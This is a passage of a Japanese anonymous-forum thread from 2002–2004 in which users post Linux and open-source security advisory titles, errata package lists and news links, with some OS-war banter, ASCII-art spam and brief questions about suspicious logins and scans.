253 :login:Penguin:02/12/02 11:53 ID:Zdu7sQxg.net
12/02 Vine-errata security hole

Canna-3.6p1-0vl1.i386.rpm
Canna-devel-3.6p1-0vl1.i386.rpm
libcanna-3.6p1-0vl1.i386.rpm


254 :login:Penguin:02/12/02 13:53 ID:XGmmgIbl.net
>>251
やたらとあちこちのリナスレに書き込まれてるけど、

1 普通の人がセキュリティに関する意識高揚のために貼っている
2 リナ信者が$のアホっぷりをさらずために貼っている
3 何らかの理由によりリナに恨みを抱いている、あるいは
  窓でちょっとばかりの知識にしがみついた人が
  リナを見下したくて貼っている

どれなんでしょう?

255 :login:Penguin:02/12/02 17:33 ID:Xof3jkhf.net
>>243
>>243
デフォールト設定がOpenBSDよりも固いOSは、今ではいくらでもあるぞ。

OpenBSDの登場当初は確かに、デフォールト設定が最もセキュアなOSだった
けど、その思想が広まった今では、どちらかといういうと、デフォールト設定
が甘いOSになっちゃったんじゃないの? いまだにデフォールトでsshdを起動
しておくなんて正気とは思えん (OpenSSH のサーバー側に、ここ2年でいくつ
remote hole が見つかったのやら...)。それとも、OpenBSD の最新版では
sshd やら portmap やらを起動しなくなったの?

256 :login:Penguin:02/12/02 21:53 ID:/tJs03oT.net
>  窓でちょっとばかりの知識にしがみついた人が

誰か、和訳してくれ。

257 :login:Penguin:02/12/03 00:41 ID:dM/xGgbt.net
12/03 Vine-errata security fix

glibc-2.2.4-14vl13.i386.rpm
glibc-common-2.2.4-14vl13.i386.rpm
glibc-devel-2.2.4-14vl13.i386.rpm
glibc-profile-2.2.4-14vl13.i386.rpm
nscd-2.2.4-14vl13.i386.rpm


258 :255:02/12/03 11:29 ID:YEO1uHIX.net
>>256
和訳
窓でソフトウェアのインストールができるようになりました
窓でインターネットの設定ができます
窓パソコンを自作できます
VC++使って開発をやっています
窓で毎日2時間チャットをやってます
Linux?ああ、あのオタ向けのOSですね。(使ったことはない)
Linux?対応する周辺機器、ソフトが少なくて使い物になりませんよ
Linux?インストールだけで苦労して後は使い物にならないダメOSでしょ

な感じかなー?今までの経験からして。

259 :login:Penguin:02/12/03 11:38 ID:vfqO2k1x.net
>>256
原文:
窓でちょっとばかりの知識にしがみついた人が
リナを見下したくて貼っている

和訳:
セキュリティ面で色々言われていたWindowsユーザーが、
ここぞとばかりにLinuxを見下したくて貼っている。
(ついでにWindowsは設定が簡単なので、Windowsユーザーは知識が乏しい
と言ってみるテスト)

260 :255:02/12/03 11:49 ID:YEO1uHIX.net
>>259
あぁ、そう言ってしまうと身も蓋もないから避けてたのになぁ。(^_^;)

261 :254:02/12/03 11:50 ID:YEO1uHIX.net
(×)255
(○)254

262 :sage:02/12/05 00:29 ID:2ZCfTFxe.net
> Linux?ああ、あのオタ向けのOSですね。(使ったことはない)

ま、プロ向けかアマ向けか、ちゅーことですな。
本当のプロは商用Unixでがっぽり稼ぐ、いう話もあるが。

263 :login:Penguin:02/12/05 00:30 ID:2ZCfTFxe.net
ああ、またやってもた。
俺ってバカ。


264 :login:Penguin:02/12/05 01:40 ID:X2AKkBXQ.net
>>262 氏ね

265 :login:Penguin:02/12/07 13:52 ID:jYK9D6LS.net
BSD:東工,慶応矢上,奈良
Linux:会津

266 :login:Penguin:02/12/11 03:43 ID:9SlxkTcQ.net
12/10 Vine-errata security hole

w3m-0.3.2.2-0vl0.26.i386.rpm

267 :login:Penguin:02/12/15 16:56 ID:VmqacBB3.net
http://www.phatlinux.com
phat linux逝った?

268 :login:Penguin:02/12/18 02:10 ID:tuH8qVMB.net
ftp://ftp.openssl.org/source/

openssl-0.9.6h.tar.gz

何だ?openssl-0.9.6h.BOGUS.tar.gz ってのは。

269 :login:Penguin:02/12/18 02:49 ID:ogHzpI80.net
>>268
diff とってみ。

270 :login:Penguin:02/12/18 15:54 ID:IsAGpRc0.net
ってか、patch置いてあるし。
しかもバージョン番号age忘れただけという・・・。

271 :login:Penguin:03/01/09 02:43 ID:X6ogbEfM.net
おなまえをいちいち考えなくていいからfusianasanっていいよね♪
最初ね、かぶっちゃったこともあったしでもあいぴーっていうのはかぶらないんだね♪

272 :login:Penguin:03/01/09 04:16 ID:Oi0l0YhT.net
>>361
平壌放送。N速にウェー、ハッハッハッスレあるから探してみ。

273 :login:Penguin:03/01/09 17:48 ID:QGQ81fMJ.net
1/8
Debian Security Advisory
DSA-224-1 canna -- buffer overflow and more

274 :login:Penguin:03/01/11 15:23 ID:/9+PJpGC.net
Debian Security Advisory
1/10
DSA-226 xpdf-i integer overflow
1/9
DSA-225 tomcat4 source disclosure

275 :山崎渉:03/01/15 11:44 ID:wo7m90to.net
(^^)

276 :login:Penguin:03/01/19 17:16 ID:uf20jSa0.net
Debian
1/17] DSA-231 dhcp3 stack overflows
1/16 DSA-230 bugzilla insecure permissions, spurious backup files
1/15 DSA-229 imp SQL injection
1/14 DSA-228 libmcrypt buffer overflows and memory leak
1/13 DSA-227 openldap2 buffer overflows and other bugs

277 :login:Penguin:03/01/24 13:01 ID:oqnAbVW5.net
Debian
1/23
DSA-240 kdegames several
DSA-239 kdesdk several
DSA-238 kdepim several
DSA-237 kdenetwork several
1/22
DSA-236 kdelibs several
DSA-235 kdegraphics several
DSA-234 kdeadmin several
1/21
DSA-233 cvs doubly freed memory
1/20
DSA-232 cupsys several

278 :login:Penguin:03/01/26 15:14 ID:sb23W7KJ.net
Debian
1/24
DSA-243 kdemultimedia several
DSA-242 kdebase several
DSA-241 kdeutils several

279 :login:Penguin:03/02/02 16:35 ID:Rt1NfCad.net
Debian
1/31
DSA-248 hypermail buffer overflows
1/30
DSA-247 courier-ssl missing input sanitizing
1/29
DSA-246 tomcat information exposure, cross site scripting
1/28
DSA-245 dhcp3 ignored counter boundary
1/27
DSA-244 noffle buffer overflows

280 :login:Penguin:03/02/18 15:12 ID:CekoRUxQ.net
Debian
2/14
DSA-251 w3m missing HTML quoting
2/12
DSA-250 w3mmee-ssl missing HTML quoting
2/11
DSA-249 w3mmee missing HTML quoting

281 :login:Penguin:03/02/20 19:30 ID:6GOTZljH.net
OpenSSL Security Advisory [19 February 2003]
Timing-based attacks on SSL/TLS with CBC encryption

http://www.openssl.org/news/secadv_20030219.txt

282 :login:Penguin:03/02/25 19:35 ID:kTElg38X.net
Debian
2/24
DSA-253 openssl information leak
2/21
DSA-252 slocate buffer overflow

283 :login:Penguin:03/03/04 10:45 ID:9DAOHkRs.net
Sendmail における深刻なセキュリティ脆弱性について
http://www.ipa.go.jp/security/ciadr/20030303sendmail.html


284 :login:Penguin:03/03/04 10:46 ID:eH2UwdTM.net
Sendmailのヘッダー処理に対する脆弱性
http://www.isskk.co.jp/support/techinfo/general/SendmailHeader_xforce.html

Remote Sendmail Header Processing Vulnerability
http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=21950

CERT Advisory CA-2003-07 Remote Buffer Overflow in Sendmail
http://www.cert.org/advisories/CA-2003-07.html

285 :bloom:03/03/04 11:44 ID:IbbEqegY.net
http://www.agemasukudasai.com/bloom/

286 :login:Penguin:03/03/04 11:54 ID:XcJd8/fD.net
>>283-284
洒落にならんな、これは。

287 :login:Penguin:03/03/04 22:54 ID:4pdCFVc3.net
洒落にならんけど、不要に煽る香具師もどうかと :-)



288 :login:Penguin:03/03/05 13:51 ID:sbwwPHEA.net
だれが不要に煽ってるんだ? 被害妄想だろ。

289 :login:Penguin:03/03/05 13:58 ID:EsL/wirr.net
http://pc3.2ch.net/test/read.cgi/jisaku/1044958245/l50
1を自殺に追い込むスレ

290 :login:Penguin:03/05/27 23:35 ID:qlYLaq9J.net
http://www.vinelinux.org/errata/25x/i386.html
に出ている「sambaのセキュリティホール」ってのは、

Vine 2.1.5 以下には関係無いの??
http://www.vinelinux.org/errata/2x/i386.html

291 :290:03/05/28 00:53 ID:goQ6Azbn.net
あ、補足です。>>290は、
http://www.vinelinux.org/errata/25x/i386.html
の2003,05,17 付けの方の「sambaにセキュリティホール」
についてです。

292 :山崎渉:03/05/28 16:40 ID:4u9ffZfO.net
     ∧_∧
ピュ.ー (  ^^ ) <これからも僕を応援して下さいね(^^)。
  =〔~∪ ̄ ̄〕
  = ◎――◎                      山崎渉

293 :山崎 渉:03/07/15 11:34 ID:2JhhXBQM.net

 __∧_∧_
 |(  ^^ )| <寝るぽ(^^)
 |\⌒⌒⌒\
 \ |⌒⌒⌒~|         山崎渉
   ~ ̄ ̄ ̄ ̄

294 :ぼるじょあ ◆yBEncckFOU :03/08/02 05:27 ID:+QUfMouI.net
     ∧_∧  ∧_∧
ピュ.ー (  ・3・) (  ^^ ) <これからも僕たちを応援して下さいね(^^)。
  =〔~∪ ̄ ̄ ̄∪ ̄ ̄〕
  = ◎――――――◎                      山崎渉&ぼるじょあ

295 :login:Penguin:03/08/15 09:32 ID:Fk89fFRa.net
age

296 :山崎 渉:03/08/15 22:16 ID:dil3w4kp.net
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

297 :山崎 渉:03/08/15 22:29 ID:ep0zwfOh.net
    (⌒V⌒)
   │ ^ ^ │<これからも僕を応援して下さいね(^^)。
  ⊂|    |つ
   (_)(_)                      山崎パン

298 :login:Penguin:03/08/19 14:07 ID:678Ux40N.net
3日前ぐらいから
210.21.34.66 - - [19/Aug/2003:11:20:36 +0900] "GET / HTTP/1.1" 200 3208 "-" "Moz
illa/4.0 (compatible; MSIE 5.5; Windows 98)"
61.182.255.188 - - [19/Aug/2003:11:21:30 +0900] "GET / HTTP/1.1" 200 3208 "-" "M
ozilla/4.0 (compatible; MSIE 5.5; Windows 98)"

みたいなのがすごい頻度(2分おきぐらい)でapache宛にくるんですが、これってどれと関連してるの?

299 :login:Penguin:03/08/24 19:44 ID:LGNONZ7b.net
Linuxにセキュリティホールなんてあるわけないだろ
M$の糞OSと一緒にすんな


300 :login:Penguin:03/08/24 20:29 ID:FhrrhDDR.net
つまらん

301 :ピーター・ベントン:03/09/24 01:21 ID:juie5mui.net
OpenSSHにもバグが
http://japan.cnet.com/news/ent/story/0,2000047623,20060999,00.htm

302 :login:Penguin:03/10/01 19:20 ID:Ps8l3gR3.net
OpenSSLにDoSを引き起こす脆弱性

303 :login:Penguin:03/10/27 23:34 ID:ERg+VwNs.net
穴があったら入りたい

304 :login:Penguin:03/10/28 21:54 ID:obMOUynA.net
Linux勧告ウォッチ - 2003年10月24日
http://japan.linux.com/security/03/10/28/0242245.shtml

305 :login:Penguin:03/10/30 08:27 ID:ySJ+EFpp.net
Apache 1.3系列、2.0系列がともにバージョンアップ
http://www.zdnet.co.jp/enterprise/0310/30/epn09.html

306 :login:Penguin:03/11/02 11:32 ID:9Ygmx0G1.net
Mac OS Xに大量の脆弱性、解決策は新バージョンのOSへの移行のみ
http://www.zdnet.co.jp/enterprise/0310/30/epn05.html
http://www.zdnet.co.jp/enterprise/0310/30/epn11.html
http://headlines.yahoo.co.jp/hl?a=20031030-00000005-vgb-sci
http://japan.cnet.com/news/tech/story/0,2000047674,20061692,00.htm
http://internet.watch.impress.co.jp/www/article/2003/0411/macos.htm

"Panther"に深刻な障害--一部の外付けHDでデータ消失の危険性
http://headlines.yahoo.co.jp/hl?a=20031031-00000004-cnet-sci
http://www.zdnet.co.jp/news/0310/31/nebt_15.html
ttp://japan.cnet.com/news/tech/story/0,2000047674,20061724,00.htm
tp://www.lacie.co.jp/product/hdd.html


307 :ファンファン:03/11/02 20:25 ID:556aM5ia.net
遂にドラクエ9発売!
詳細はここで入手!
http://www.dorakue.com

308 :login:Penguin:03/11/05 14:42 ID:9kuD0vlS.net
Linux勧告ウォッチ - 2003年10月31日
http://japan.linux.com/security/03/11/05/0033248.shtml

309 :login:Penguin:03/11/11 15:14 ID:HsPpywCL.net
Linux勧告ウォッチ - 2003年11月7日
http://japan.linux.com/security/03/11/11/0149228.shtml

310 :login:Penguin:03/11/18 21:48 ID:SdQL4FsV.net
Linux勧告ウォッチ - 2003年11月14日
http://japan.linux.com/security/03/11/17/1638203.shtml

311 :login:Penguin:03/11/27 01:44 ID:prSLxxQ4.net
Linux勧告ウオッチ - 2003年11月21日(金)
http://japan.linux.com/security/03/11/25/1413254.shtml

312 :login:Penguin:03/12/02 21:52 ID:QTZAxPpf.net
Linux勧告ウオッチ - 2003年11月28日(金)
http://japan.linux.com/security/03/12/02/0256223.shtml

313 :login:Penguin:03/12/09 18:13 ID:/fLfndsD.net
Linux勧告ウオッチ - 2003年12月5日(金)
http://japan.linux.com/security/03/12/09/063205.shtml

314 :login:Penguin:03/12/16 15:15 ID:mykGXu/A.net
Linux勧告ウオッチ - 2003年12月12日(金)
http://japan.linux.com/security/03/12/15/1428228.shtml

315 :login:Penguin:03/12/17 10:12 ID:VpqBEH4o.net
ethereal

0.9?.?? => 0.10かよ


316 :login:Penguin:03/12/17 18:49 ID:TkILKMt3.net
Debian
12/17
DSA-401-1 hylafax -- format strings
12/17
DSA-402-1 minimalist -- unsanitised input

317 :login:Penguin:03/12/24 16:35 ID:iGk6TAXx.net
Linux勧告ウオッチ - 2003年12月19日(金)
http://japan.linux.com/security/03/12/23/1814241.shtml

318 :login:Penguin:03/12/30 14:32 ID:qU3nvfcf.net
Linux勧告ウオッチ - 2003年12月26日(金)
http://japan.linux.com/security/03/12/29/1120233.shtml

319 :login:Penguin:03/12/31 16:05 ID:m71Pca6B.net
12/29
Gentoo: cvs Privilege escalation vulnerability

12/30
Debian: xsok Missing privelige release

320 :login:Penguin:04/01/01 17:24 ID:WtCAo48K.net
12/31
Mandrake: proftpd Root access vulnerability

321 :login:Penguin:04/01/06 16:04 ID:tgdBSY23.net
1/5/
Suse: kernel Privilege escalation vulnerability

1/5/
Red Hat: kernel Privilege escalation vulnerability

1/5/
Debian: screen Privilege leak vulnerability

1/5/
Debian: lftp Buffer overflow vulnerability

1/5/
Debian: ethereal Denial of service attack

322 :login:Penguin:04/01/07 14:32 ID:mCNdx8uW.net
1/6
Debian: kernel Privilege escalation vulnerability

1/6
Turbolinux: kernel Privilege escalation vulnerability

1/6
Debian: nd Buffer overflow vulnerability

1/6
Debian: mpg321 Malformed format string vulnerability

1/6
Debian: libnids Buffer overflow vulnerability

1/6
Debian: BIND Cache poisoning vulnerability

1/6/
Fedora: kernel Privilege escalation vulnerability

323 :login:Penguin:04/01/08 15:12 ID:MHF0VDdD.net
1/7
Debian: kernel More for Priv. Esc vulnerability

1/7
Debian: fsp Buffer overflow/Directory traversal vulns.

1/7
Debian: zebra Denial of Service vulnerability

1/7
Debian: jabber Denial of Service vulnerability

1/7
Fedora: etherial Denial of Service vulnerability

1/7
Slackware: kernel Privilege escalation vulnerability

324 :login:Penguin:04/01/09 00:08 ID:uoDpOTlw.net
1/8
Debian: vbox3 Privilege leak vulnerability

325 :login:Penguin:04/01/09 17:56 ID:m1uGuzrs.net
1/8
Red Hat: etherial Denial of Service vulnerabilities

1/8
Mandrake: kernel Privilege escalation vulnerability

326 :login:Penguin:04/01/10 14:20 ID:NAw+6fyF.net
1/9
Debian: kernel Priv. Escal. additional patches

1/9
Debian: phpgroupware Multiple vulnerabilities

1/9
Slackware: kernel Priv. Escal. patch for 8.1

1/9
Gentoo: kernel Privilege escalation vulnerability

327 :login:Penguin:04/01/13 15:43 ID:34XHBVjP.net
1/12
Debian: mod-auth-shadow Account expiration not enforced

1/12
Red Hat: cvs Chroot breakout vulnerability

1/12
Debian: jitterbug Improper input sanatizing

328 :login:Penguin:04/01/14 14:38 ID:rCvtgFmv.net
1/13
Mandrake: etherial Multiple DoS vulernabilities

329 :login:Penguin:04/01/15 00:33 ID:3fXHLowM.net
1/14
Red Hat: kdepim Buffer overflow vulnerability

1/14
Suse: tcpdump Denial of service vulnerability

330 :login:Penguin:04/01/15 15:22 ID:dMc7vbOt.net
1/14
Red Hat: tcpdump Denial of service vulnerability

331 :login:Penguin:04/01/16 01:41 ID:+3ppuQmE.net
1/15
Mandrake: kdepim Permission leak vulnerability

1/15
Slackware: kdepim Permission leak vulnerability

1/15
Slackware: INN Buffer overflow vulnerability

1/15
Suse: kernel Many vulnerabilities fixed for 64bit

1/15
Debian: kernel-image-2.4.17-ia64 Many backported vuln fixes

1/15
Debian: cvs Multiple vulnerabilities

332 :login:Penguin:04/01/17 15:54 ID:5S8lxjG3.net
1/16
Debian: tcpdump Multiple vulnerabilities

1/16
Debian: mc Improper execution vulnerability

333 :login:Penguin:04/01/20 15:50 ID:mQMVpaJK.net
1/19
Debian: kernel MIPS version of mremap() fix

1/19
Debian: netpbm-free Insecure temporary files

334 :login:Penguin:04/01/22 14:45 ID:jmIdE/7G.net
1/21
Red Hat: mc Buffer overflow vulnerability

1/20
Debian: slocate Heap buffer overflow

335 :login:Penguin:04/01/23 15:26 ID:7CVecfCu.net
1/22
Red Hat: slocate Heap overflow vulnerability

1/22
Gentoo: honeyd Honeyd remotely identifiable

1/22
Turbolinux: lftp and tcpdump Multiple vulnerabilities

336 :login:Penguin:04/01/24 15:57 ID:9X5tQd78.net
1/23
Mandrake: jabber Denial of service vulnerability

1/23
Mandrake: slocate Heap overflow

337 :login:Penguin:04/01/27 15:46 ID:hvesCWle.net
1/26
Debian: gnupg Signing key vulnerability

1/26
Slackware: gaim Multiple vulnerabilities

1/26
Fedora: slocate Heap overflow vulnerability

1/26
Red Hat: gaim Multiple vulnerabilities

338 :login:Penguin:04/01/27 16:33 ID:YyU14vbY.net
今しがた、SSHでサーバをいじっていたらなぜか、SSHが切られたので
w をしてみるとなぜか、自分以外にSSHで入っているやつが3人いた。
しかもIPとか知らないやつのだし…。とりあえず、SSHを落としておいたけど
なぜ??ユーザも一人しか作ってないし、パスワードだってかなり意味不明な
羅列にしているんだが。

339 :login:Penguin:04/01/27 17:11 ID:OegfoTkR.net
なぜって、あーた・・・・

340 :login:Penguin:04/01/27 17:28 ID:zm4xkZWO.net
>>338
誤爆か
http://pc.2ch.net/test/read.cgi/linux/1066791728/


341 :login:Penguin:04/01/28 12:59 ID:VzrkJnLc.net
1/27
Fedora: screen Privilege escalation vulnerability

1/27
Gentoo: gaim Multiple vulnerabilities

1/27
Gentoo: mod_python Denial of service vulnerability

1/27
Mandrake: tcpdump Non-sanitized input vulernability

1/27
Mandrake: mc Buffer overflow vulnerability

1/27
Mandrake: gaim Multiple vulnerabilities

342 :login:Penguin:04/01/29 11:50 ID:qUlrQkgM.net
1/28
Debian: trr19 Missing privilege release

343 :login:Penguin:04/01/30 14:33 ID:MB+bTEJk.net
1/29
Suse: gaim Multiple vulnerabilities

344 :この頃思うこと:04/02/01 22:44 ID:OV3kvQR/.net
最近、強力なウイルスが時々出回るようになった。
標的は、ほぼ市場を独占状態のOSだが、その度に大騒ぎして多数のPCに対応
ソフトを入れていると、何だかバカバカしくなってくる。影で誰かが儲けて
いるんじゃないかと勘ぐりたくさえなる。
とはいえ、SOHOに限らずメールの送受信ができなくなれば死活問題となるわけで、
いつも、何とかするわけだが。最悪、感染したときの対応策は用意しておいた
方がよさそうだ。

そのひとつの方法は、代替OSを用意しておくことかもしれないとこの頃思う。
OSも幾つかあるが、
MACは専用のPCやOSが必要なので割高だ。となると、LINUX系を起動できるよう
にしておいて、とにかく急場をしのぐ方法が良さそうに思えるのだが・・
むろん、今後、LINUX系が普及するにつれて、それを標的にするウイルスが出ない
とは言えないのだけれど、現時点ではどんなものだろうか。

345 :login:Penguin:04/02/03 00:27 ID:p/emivL5.net
2/2
Debian: perl Information leak

346 :login:Penguin:04/02/03 15:34 ID:4QCHqYoG.net
2/2
Mandrake: gaim Multiple vulernabilities

2/2
Fedora: cvs Multiple vulnerabilities

347 :login:Penguin:04/02/04 00:52 ID:B2bpk8Si.net
2/3
Fedora: etherial Denial of service vulnerability

2/3
Fedora: tcpdump Malformed packet vulnerability

2/3
Red Hat: util-linux Login data leakage

2/3
Red Hat: mc Buffer overflow vulnerability

2/3
Red Hat: NetPBM Temporary file vulnerabilities

348 :login:Penguin:04/02/04 17:22 ID:2SiWtXLZ.net
2/3
Red Hat: kernel Multiple vulnerabilities

2/3
Debian: crawl Buffer overflow vulnerability

349 :login:Penguin:04/02/05 14:41 ID:IYKi/1SV.net
2/4
Debian: kernel Privilage escalation MIPS patch

350 :login:Penguin:04/02/07 15:54 ID:HkAvMxBY.net
2/6
Red Hat: 'netpbm' temporary file vulnerabilities

2/6
Debian: 'mpg123' heap overflow

2/6
Debian: 'gaim' vulnerabilities

2/5
Red Hat: 'mailman' XSS vulnerabilities

2/5
Mandrake: 'glibc' resolver overflow

351 :login:Penguin:04/02/10 15:52 ID:qHPAEEwe.net
2/9
Red Hat: gaim Multiple vulnerabilities

2/9
Gentoo: PHP Leaking globals vulnerability

2/9
Debian: mailman Multiple vulnerabilities

2/9
Red Hat: NetPBM Temporary file vulnerabilities

352 :login:Penguin:04/02/12 15:41 ID:ZifOyE2f.net
2/11
Red Hat: mutt Denial of service vulnerability

2/11
Gentoo: gallery PHP injection vulnerability

2/11
Gentoo: monkeyd Denial of service vulnerability

2/11
Gentoo: XFree86 Buffer overflow vulnerability

353 :login:Penguin:04/02/13 00:43 ID:6DEVRcPX.net
2/12
Mandrake: netpbm Temporary file vulnerabilities

2/12
Mandrake: mutt Denial of service vulnerability

2/12
Debian: cgiemail Open mail relay

354 :login:Penguin:04/02/14 16:44 ID:mnqazerT.net
2/13
Slackware: XFree86 Multiple buffer overflows

2/13
Slackware: mutt Buffer overflow vulnerability

2/13
Red Hat: PWLib Denial of service vulnerability

2/13
Red Hat: XFree86 Multiple buffer overflows

355 :login:Penguin:04/02/18 23:06 ID:U3AQAaGV.net
ぬう

Linux kernel do_mremap VMA limit local privilege escalation vulnerability

A critical security vulnerability has been found in the Linux kernel
memory management code inside the mremap(2) system call due to missing
function return value check. This bug is completely unrelated to the
mremap bug disclosed on 05-01-2004 except concerning the same internal
kernel function code.

http://www.isec.pl/vulnerabilities/isec-0014-mremap-unmap.txt


356 :login:Penguin:04/04/19 21:18 ID:fav3bE2Z.net
Linux勧告ウォッチ - 2004年4月16日(金)
http://japan.linux.com/security/04/04/19/0823236.shtml?topic=1

357 :login:Penguin:04/05/08 17:40 ID:MyEV46Nv.net
lhaにセキュリティホールが見つかったらすぃ

358 :login:Penguin:04/05/08 18:01 ID:i2Twl562.net
>>357
これでつね。
http://pc5.2ch.net/test/read.cgi/linux/1077596486/320

359 :login:Penguin:04/05/10 19:14 ID:LN1iQt2e.net
作者は放置プレイ気味

360 :login:Penguin:04/05/16 23:40 ID:ijfOJj2d.net
元々lhaは日本でしか使われてないだろうし
そろそろ使うの止めて欲しいもんだ

361 :login:Penguin:04/05/16 23:45 ID:aVnYK0wB.net
DOOMがLHAで圧縮されていたのを思い出した

362 :login:Penguin:04/05/20 14:21 ID:WWYnnNvB.net
cvsとsubversionにセキュリティホールだと。

363 :login:Penguin:04/05/21 18:19 ID:6uFN7DQY.net
埋めますた

364 :login:Penguin:04/05/21 18:22 ID:lpNxrFu0.net
sourceforge.jpがやられたのってこれかね。

365 :login:Penguin:04/05/21 18:39 ID:6uFN7DQY.net
シスコがTCP欠陥セキュリティフィックスの特許を申請
http://japan.cnet.com/news/sec/story/0,2000050480,20068083,00.htm

366 :login:Penguin:04/06/10 15:04 ID:swAq85SC.net
オープンソース・コード管理アプリ「CVS」に6つの脆弱性--セキュリティ研究者らが発見
http://japan.cnet.com/news/sec/story/0,2000050480,20069154,00.htm

ソッコー埋めとけよ。
前回見事にクラックされたサイトの管理者諸君。

367 :login:Penguin:04/06/10 23:51 ID:Biho7Cx0.net
今回はどこが醜態を晒すのか見物

368 :login:Penguin:04/06/11 00:17 ID:MlvinFBo.net
今回それはないヨ。exploitが晒されていないからね。
侵入される奴もヘタレなら侵入する奴もヘタレ。

369 :login:Penguin:04/06/11 00:28 ID:tEEDVtFM.net
>>368
惜しい!もうちょっとでIDがvine

370 :login:Penguin:04/06/24 23:48 ID:LKAGg7Xa.net
●.....●..●..●...●●..●●...●●..●●●....●●●●..●●.....●●●..●..●

無料のウイルス対策ソフトなどのセキュリティソフト一覧
http://www.geocities.co.jp/SiliconValley-Cupertino/2010/security.html

●.●.●.●..●...●●.●..●●.●●......●..●●...●●...●●●.....●.●...●

371 :login:Penguin:04/06/25 08:40 ID:3aBxue6Z.net
(´-`).。oO(板が違う気がする…)

372 :login:Penguin:04/06/28 15:18 ID:7wrh5jjV.net
Hiki の脆弱性に関する注意喚起
http://www.namaraii.com/hiki/alert20040628.txt

373 :login:Penguin:04/06/29 14:45 ID:znjWYPYB.net
Apacheに新たな脆弱性、各社がパッチリリース
http://www.itmedia.co.jp/enterprise/articles/0406/29/news010.html

374 :login:Penguin:04/06/29 20:26 ID:AEBbJAuz.net
>>373
ITMediaは二週間前の脆弱性を今頃騒いでどうする?
もしかして腐れDebian厨が居るのか?

375 :login:Penguin:04/06/30 05:19 ID:Yw6CWVlx.net
↑腐れヘドロ厨

376 :login:Penguin:04/06/30 05:31 ID:VxTrWu/Q.net
バグだらけのFedora何て使ってるとストレス溜まるんでつね。

イキロ>>374

377 :login:Penguin:04/06/30 08:00 ID:3WcuXvGN.net
Deb厨って本当に社会のあちこちで迷惑をかけてるな

378 :login:Penguin:04/07/01 19:48 ID:OqSpKNxT.net
linux 2.6 に死のパケット脆弱性
ttp://www.ku3g.org/negi/diary/?20040701#200407010

379 :login:Penguin:04/07/03 18:42 ID:I8EJ9gk9.net
フレーム詐称の問題はIE以外のWebブラウザにも
http://www.itmedia.co.jp/enterprise/articles/0407/02/news015.html?c

380 :login:Penguin:04/07/04 00:08 ID:4SqICt0G.net
HPがセキュリティ問題でNetscapeの削除を呼びかけ
http://www.itmedia.co.jp/enterprise/articles/0407/02/news023.html

381 :たわば:04/07/23 14:07 ID:2ZKDc5PV.net
ファイル共有ソフトSamabaにセキュリティ・ホール
http://nikkeibp.jp/wcs/leaf/CID/onair/jp/flash/321308

382 :login:Penguin:04/08/17 16:56 ID:kG5XOZPe.net
CVSにまた新たな脆弱性
http://www.itmedia.co.jp/enterprise/articles/0408/17/news011.html

383 :login:Penguin:04/09/04 00:53 ID:tJIPt+jW.net
http://www.inter7.com/

384 :login:Penguin:04/09/17 14:42:44 ID:VXVHqApo.net
GdkPixBufに脆弱性、Linuxベンダーが対応
http://www.itmedia.co.jp/enterprise/articles/0409/17/news006.html

385 :login:Penguin:04/09/28 05:05:35 ID:Y+uhbf9u.net
「苺きんたま」(トロイの木馬)が2chで流行中。Linuxにも感染するそうです。
http://headlines.yahoo.co.jp/hl?a=20040925-00000013-zdn_ep-sci
http://www.symantec.com/region/jp/avcenter/venc/data/pf/jp-trojan.upchan.html

386 :login:Penguin:04/09/28 08:12:20 ID:nlw8901Q.net
>>385
> Linuxにも感染するそうです。
ソースきぼん。

387 :login:Penguin:04/09/28 08:22:45 ID:qeKmiFBj.net
それよりJpeg-GDIウィルスのほうが重大問題だけどな。

388 :login:Penguin:04/09/28 21:46:28 ID:Y+uhbf9u.net
>>386
あ、ごめんLinuxは影響なしでした。

389 :login:Penguin:04/10/02 20:11:13 ID:0N5ydXGU.net
Sambaにセキュリティ・ホール,公開ディレクトリ外にアクセスされる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041001/150664/

390 :login:Penguin:04/10/09 20:01:16 ID:xhbHGJ5V.net
brutesshによるサーバへのアクセスがあるのですが、
これは、感染によって拡がるものなのでしょうか。
LAN内からのアクセスが見つかり、どうすべきか考えています。


391 :login:Penguin:04/10/09 20:07:47 ID:pBYKN384.net
>>390
ウィルスではないので感染はしない。
LAN内にクラックされたマシンか不届き者が居る。

392 :login:Penguin:04/10/09 20:08:47 ID:Vjy+vqkI.net
>>390
攻撃元のPCを調べりゃいいじゃん

393 :login:Penguin:04/10/21 10:04:37 ID:FxTdJBK4.net
非IEブラウザでタブ機能に脆弱性
http://www.itmedia.co.jp/enterprise/articles/0410/21/news011.html

394 :login:Penguin:04/10/25 17:36:28 ID:bqye+ZzN.net
Apache、深刻な脆弱性修正のアップデートリリース
http://www.itmedia.co.jp/enterprise/articles/0410/23/news005.html

395 :login:Penguin:04/10/26 10:31:11 ID:/V4ZShQ8.net
Linuxで利用のlibtiffとGaimに脆弱性
http://www.itmedia.co.jp/news/articles/0410/26/news015.html

396 :login:Penguin:04/10/26 17:16:28 ID:/V4ZShQ8.net
Linux勧告ウォッチ - 2004年10月22日(金)
http://japan.linux.com/security/04/10/25/1521204.shtml

397 :login:Penguin:04/10/27 07:53:07 ID:4omHsqys.net
インターネットに接続しない場合は、セキュリティホールは
関係ないよね。

398 :login:Penguin:04/10/27 10:03:37 ID:Cgdba6iT.net
ローカルでログインしたユーザーからやられる場合はある。


399 :login:Penguin:04/10/28 19:45:52 ID:Z91dAyo0.net
オープンソースCMSのPostNuke、攻撃される
http://japan.linux.com/security/04/10/28/0229229.shtml

400 :login:Penguin:04/10/28 20:49:42 ID:6h29YwsN.net
僕のセキュリティホールも埋めてください。

401 :login:Penguin:04/10/29 12:09:50 ID:6b+D47df.net
埋めてやるからroot権限をくれ。

402 :login:Penguin:04/10/31 16:59:20 ID:+ety0bys.net
OpenSSL version 0.9.7e released
Fix race condition in CRL checking code.
Fixes to PKCS#7 (S/MIME) code.
http://www.openssl.org/

403 :login:Penguin:04/11/03 11:59:04 ID:eDxNwooz.net
Linux勧告ウォッチ - 2004年10月29日(金)
http://japan.linux.com/security/04/11/02/1446238.shtml

404 :login:Penguin:04/11/03 19:08:05 ID:j4ONkIbo.net
僕のヒップホールも埋めてください。


405 :login:Penguin:04/11/05 20:40:57 ID:a6sIbeQb.net
×ヒップホール
○アヌス

406 :login:Penguin:04/11/10 00:41:58 ID:/czt/x2r.net
Linux勧告ウォッチ - 2004年11月5日(金)
http://japan.linux.com/security/04/11/09/0134221.shtml

